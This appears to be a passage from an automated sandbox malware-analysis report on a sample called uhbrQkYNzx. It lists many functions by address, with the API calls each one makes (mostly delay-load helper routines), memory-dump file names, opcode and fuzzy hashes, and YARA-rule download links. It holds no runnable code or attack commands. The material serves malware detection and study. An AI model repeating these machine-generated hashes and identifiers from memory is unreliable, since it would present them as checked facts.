                                                              • Instruction ID: fb6e2139059aac84a3e9905be2f781f3a1164d9194c1522806a7fd40d3595362
                                                              • Opcode Fuzzy Hash: 202346f946c530ea689b9e9d21f412cccbfc8d53efb2d2ab8b654ce7cd64d635
                                                              • Instruction Fuzzy Hash: 31B012812DC2417C320855953F03D77414DC1C1F30330C91BF400C2283E4408C442132
                                                              Function 009B4A07 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3e50e105e87921c21ba730ed9f511efd4b2beeb090178220ec083c98047a4218
                                                              • Instruction ID: 5bd0d903965ff3f8883070b87a76915c6b7ebf66679a7c2774c80841983f4b31
                                                              • Opcode Fuzzy Hash: 3e50e105e87921c21ba730ed9f511efd4b2beeb090178220ec083c98047a4218
                                                              • Instruction Fuzzy Hash: A5B012812DC2507C321451953F03D77414DC1C1F30330CD1BF400C6143E4404C402132
                                                              Function 009B4B8A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 114e797129f1c4589826b9048e4786bac994c604d52c58395aa064581a641203
                                                              • Instruction ID: d386bb07f3b90e2f5061fb30bc97cc526da583a3359d5b9edc783c092563cdfa
                                                              • Opcode Fuzzy Hash: 114e797129f1c4589826b9048e4786bac994c604d52c58395aa064581a641203
                                                              • Instruction Fuzzy Hash: 6EB012822DC250BC314451CA1F03E7B414DC0C0B35330D51BF500C3247E4405C402132
                                                              Function 009B4B58 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: bac5307ef1521f0d0572f651c65d9fcd09347ebc409583ad99799f9a988f3884
                                                              • Instruction ID: 12a3813c82114036d63e270268d8aeaf1de44c8158b502d187be3a535c7e35b8
                                                              • Opcode Fuzzy Hash: bac5307ef1521f0d0572f651c65d9fcd09347ebc409583ad99799f9a988f3884
                                                              • Instruction Fuzzy Hash: EAB012822DC2507C3204A18A5F03E7B414DC0C0B35330971BF100C3187E4404C842032
                                                              Function 009B4B62 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 903ed193295733019083d8eba60c8b644cbe4d2f91f4e52f25af619f4e510984
                                                              • Instruction ID: d15f0b524a1fd01d00280196020a8ab9d06ccc5c7cd94a2d31abf3241c5d69b8
                                                              • Opcode Fuzzy Hash: 903ed193295733019083d8eba60c8b644cbe4d2f91f4e52f25af619f4e510984
                                                              • Instruction Fuzzy Hash: FDB012822DC1507C3104618A5F03E7B414DC0C0B35330D71BF200C3147E4404C422032
                                                              Function 009B4C99 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 48be86cdfeb7f6460fb8389e667c8a0f51a5ec4844011db63df6da9f77dee621
                                                              • Instruction ID: 36b5cb5e187e0a49c2971ad1e3a6bdcbe5ee83542f16877862350026e3a2aba3
                                                              • Opcode Fuzzy Hash: 48be86cdfeb7f6460fb8389e667c8a0f51a5ec4844011db63df6da9f77dee621
                                                              • Instruction Fuzzy Hash: 41B012812ED140FC314451A51F02DB7424DC1C0F31331C52BF400C3143E4400C442133
                                                              Function 009B4CB7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: d610c258fc1d205da0bc11e4d83187de7e4e2249303a3efa49af83a436d565e0
                                                              • Instruction ID: b7a104b84c3b3c4437b4b0223bb4051ebd6e474905b65ed1be7b369e94027e49
                                                              • Opcode Fuzzy Hash: d610c258fc1d205da0bc11e4d83187de7e4e2249303a3efa49af83a436d565e0
                                                              • Instruction Fuzzy Hash: 4EB012812ED141BC310451952F02EB6424DC1C0F31331852BF010C3543E4400C442033
                                                              Function 009B4CAD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5db02503facd726b1d3a8a5a9fc1ed870035a9fadbe8981e6c1be5b844aecae3
                                                              • Instruction ID: ff42eff5c81a2b1d602c3b0e12e75f8810eeb782e8694d06f92b52cccb4e3582
                                                              • Opcode Fuzzy Hash: 5db02503facd726b1d3a8a5a9fc1ed870035a9fadbe8981e6c1be5b844aecae3
                                                              • Instruction Fuzzy Hash: FDB012812ED180BC310451951F02DB7424DC1C0F31331C52BF100C3143E4400C462033
                                                              Function 009B4C7E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: e4525d2bc61b73f75644fbe84cc933615b199e9975768100eb7828346838d544
                                                              • Instruction ID: f7d0768839a28b46e0e24ce0319a6038a9debbcdb09adaaf90f101896b11cade
                                                              • Opcode Fuzzy Hash: e4525d2bc61b73f75644fbe84cc933615b199e9975768100eb7828346838d544
                                                              • Instruction Fuzzy Hash: 82B012952ED140BC310411851F02CB6420DC9D0F32331C61BF100D2043A4400C422033
                                                              Function 009B4D18 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 7aac0f06b696f6044ab601adc9c3d98758353711dc73d8a8e06e14cd723e578f
                                                              • Instruction ID: c128bc717b040761d80b3e33852a4d89d9c3ddaffb529b0f33e89c4239caa14b
                                                              • Opcode Fuzzy Hash: 7aac0f06b696f6044ab601adc9c3d98758353711dc73d8a8e06e14cd723e578f
                                                              • Instruction Fuzzy Hash: 5EB012852DD2417C310461851F02DB6415DC0C1F30330C52BF400C3143E4401C482232
                                                              Function 009B4D04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 7d86605a38ab0e9c77f7d175366642b82e2b89edc770cc94044270ba51fb8905
                                                              • Instruction ID: 65327d92333daa12f75026cd122bf399fe2a3af79f2b863e0a06d6677ef1d604
                                                              • Opcode Fuzzy Hash: 7d86605a38ab0e9c77f7d175366642b82e2b89edc770cc94044270ba51fb8905
                                                              • Instruction Fuzzy Hash: D0B012852DD3417C324461851F02DB6456DC0C0F30330863BF000C2143E4411C852032
                                                              Function 009B4D22 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 32d19db3f8e422684dbfcb7652c0d0810bd9d2542bdf84ea7d46f45ffdc4b2f3
                                                              • Instruction ID: 8c7756b9d394f86e225047032f5dbbfbc1e04519375e16c827d9d17f1cbe60d2
                                                              • Opcode Fuzzy Hash: 32d19db3f8e422684dbfcb7652c0d0810bd9d2542bdf84ea7d46f45ffdc4b2f3
                                                              • Instruction Fuzzy Hash: 55B012852DD2427C310461852F02DB6415DD0C0F30330853FF010C2143E4401C452032
                                                              Function 009A2226 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 009A2233
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 5ece1b9e54eb964ac728fa85016d8ee027c72d24fb3ea0ebe4f8d94e39c6d0b8
                                                              • Instruction ID: 52f07a56ba34090fa02f5ffae3f6029c3d57a38cd8b1ac9e5c11954151227fc6
                                                              • Opcode Fuzzy Hash: 5ece1b9e54eb964ac728fa85016d8ee027c72d24fb3ea0ebe4f8d94e39c6d0b8
                                                              • Instruction Fuzzy Hash: EEC04C70615201DF8704CF68DA8CE0A77AABF527157518468F454CB020C734DC51DE65
                                                              Function 009B49B2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 2a4cb51c4b8f52ae41bad4585045a3da1674c705b045322b5957546b6ac29c40
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: 2a4cb51c4b8f52ae41bad4585045a3da1674c705b045322b5957546b6ac29c40
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              Function 009B49D0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 2bc8ec33117b3336f7b8135de9cf21012a6b7ad899620ca854f04a12629a3554
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: 2bc8ec33117b3336f7b8135de9cf21012a6b7ad899620ca854f04a12629a3554
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              Function 009B49F8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 93c6f9defc2b89014d8050ec0b2215c66a8716fa70bf34a51dbe524e61c6cc9d
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: 93c6f9defc2b89014d8050ec0b2215c66a8716fa70bf34a51dbe524e61c6cc9d
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              Function 009B49EE Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
